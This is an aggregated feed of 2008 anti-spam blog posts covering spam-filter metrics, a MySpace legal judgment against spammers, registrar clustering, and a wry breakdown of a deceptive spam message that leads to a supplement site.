Well, similarly, while I haven't completely thought through all of the details and plot points, I have a pretty good idea of what this network will do when all is said and done. The end game is to create a network that measures how well we are doing on spam and non-spam, does training on false negatives/positives, determines our response time, compares ourselves to competitors and includes piles of statistics (because I like charts).
Now I need to hire a writer to get the dialogue to not be so cheesy.
May 14, 2008 06:14 AM
Chicago Tribune: MySpace tells AP it has won $234M spam judgment:
MySpace won (not surprisingly) against Sanford Wallace and Walt Rines, both of whom have lost case after case after case but still haven’t learned anything
(via fergdawg)
May 14, 2008 12:28 AM
May 13, 2008
GCN: Whittling spam down to a manageable level: “According to a study…by KnujOn…90 percent of the illicit Web sites using spam to generate traffic are clustered on just 20 registrars…”
May 13, 2008 11:47 PM
Insight on the topic (and thoughts on industry leadership issues) from Ken Magill and Laura Atkins.
May 13, 2008 10:10 PM
I'm sure that big-time spammers ("mainsleaze" in the anti-spam trade) believe they are outstanding marketers. That's hard to reconcile with a piece of spam I saw this morning.
It claimed to come from Dilun. At first I thought it was a poor attempt to replicate the name Dillon, but upon further investigation, it is apparently a name found in Asian countries.
Using the Subject: line as a grabber, this spammer went for the jugular:
Subject: You have been caught spamming
This is one of those "impending doom" openers that is intended to get the recipient to open the message immediately—to really put him or her on the defensive.
The message body, however, is pure spam material:
Jessica Alba caught in embarassing situations on camera http://www.[Removed].com/
It's unclear to me how the spammer expects the recipient to react to the mind bend that occurs between seeing the Subject: line in the inbox and what appears to be a porn type of solicitation. Is the recipient supposed to be assuaged by the discovery that the spamming accusation was false? It's a real head-scratcher to me.
Okay, so let's say the recipient wasn't put off by the overt lie that tricked him into opening the message, but he's interested in seeing the purported "embarassing [sic] situations."
Whenever I see links to porn or pop culture photos, I usually suspect a malware installer at the destination. The spamvertised domain is so fresh that it doesn't even show up in whois yet, generally indicating that it's just temporarily parked, and will go away in a few days when the registrar discovers that it hasn't really been paid for.
I used one of my software tools to visit the site without a browser to see if the page's source code revealed any malware downloading going on. I'm able to make the server believe I'm doing this with Internet Explorer 6 for Windows to make sure I get the royal (as in "royally hosed") malware treatment.
It turns out that the spamvertised web site is only for an herbal penis enhancement med. That's the third time this spammer has screwed with the target's head. How receptive will someone be by the time he reaches this site?
BTW, I'm really glad I saw the page only in HTML source code form. There are apparently some testimonials on the page with Before and After photos. Excuse my clinical response: ew, Ew, EW!
May 13, 2008 05:04 PM
Wow… you know gas is expensive when the spammers start hawking gas cards.
Our support contact address received a message touting “Finest List of Nurses Including Email Addresses - Free $50 Gas Card” I had to wonder what the heck it was, so I took a look at the message. They were trying to sell “sales leads” — i.e. names and contact information — of nurses, and were offering to throw in the gas card if you spent enough on “leads” to do your own spamming.
Copyright © 2008
Kelson Vibber and/or Katherine Foreman. This feed is for personal non-commercial use only. Permission to reuse granted to Planet Antispam.
May 13, 2008 05:03 PM